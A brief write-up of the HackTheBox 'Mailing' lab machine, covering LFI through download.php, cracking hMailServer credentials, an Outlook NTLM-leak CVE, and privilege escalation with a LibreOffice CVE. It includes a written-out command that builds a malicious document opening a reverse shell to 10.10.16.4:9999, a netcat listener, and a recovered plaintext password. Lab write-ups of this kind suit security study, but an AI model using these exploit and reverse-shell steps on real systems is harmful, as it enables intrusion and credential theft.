Mailing#

• I scanned all ports, sub directories and php files. Also, copies of the scans are attached here.

Initial Access#

• I discovered some php files from my ffuf scans and one interesting one was this:

download                [Status: 200, Size: 31, Words: 5, Lines: 1, Duration: 326ms]

• Requesting download.php made me more curious:

❯ curl 'mailing.htb/download.php'
No file specified for download. 

• From that results I figured out that there’s a param probably file

• And, I was correct the param was file and it returned an error page:

curl 'mailing.htb/download.php?file='
---snip--- 
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
 <div class="content-container"><fieldset>
  <h2>500 - Internal server error.</h2>
  <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3>
 </fieldset></div>
</div>
</body>
</html>

• Of course, it was clearly LFI which I confirmed later on

• After, doing some research about hmailserver, I discovered some locations it’s files are stored:

• Passing AdministratorPassword to crackstation, I got the password in clear text:

• After doing some recon about this I discovered a CVE on Microsoft Outlook that reveals ntlm hash: CVE-2024-21413

• I cracked that and got user maya, password m4y4ngs4ri

Privilege Escalation#

• I discovered that libreoffice was outdated and found a cve to exploit it. Also, C:\Important Documents this directory was writeable.

• CVE

• I compile rcat for windows and put rcat.exe in C:\ProgramData

python3 CVE-2023-2255.py --cmd 'C:\ProgramData\rcat.exe connect 10.10.16.4 9999' --output 'hack.odt'

• I started a listene with netcat on attacker: nc -lvnp 9999. Put hack.odt in C:\Important Documents and after like 30 seconds I got a shell as localadmin.

Pwned#